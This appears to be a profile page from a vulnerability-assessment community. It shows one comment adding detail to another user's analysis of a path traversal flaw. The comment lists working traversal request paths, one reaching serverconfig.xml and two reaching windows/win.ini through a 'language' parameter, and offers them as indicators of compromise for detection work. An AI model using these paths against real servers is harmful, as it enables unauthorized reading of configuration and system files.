nvn1729 (0)
Last Login: February 25, 2025
Assessments
0
Score
0
nvn1729's Latest (1) Contributions
Sort by:
Filter by:
Nice analysis! Few minor points to add…
The path traversal with
toolbox-resourceis possible with just/toolbox-resource/../serverconfig.xml.For IOCs, there are a couple of other traversal paths that work on Windows only:
/disclaimer?language=/../../../../../../../../../../../../../windows/win.ini/serverinfo.json?language=/../../../../../../../../../../../../../windows/win.ini